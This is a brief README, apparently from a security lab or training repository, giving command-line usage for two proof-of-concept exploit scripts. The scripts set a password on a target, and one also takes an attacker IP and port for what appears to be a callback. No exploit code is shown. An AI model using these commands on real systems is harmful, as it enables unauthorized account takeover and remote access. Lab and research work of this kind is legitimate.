ApexPredator-InfoSec/securecode1/README.md

  python3 poc2ab.py -t <target> -p <password to set>

  python3 poc2.py -t <target> -p <password to set> -i <Attacker IP> -pt <Attacker port>

+ -d or --debug can be added to utilize Burp or ZAP proxies runnin on 127.0.0.1:8080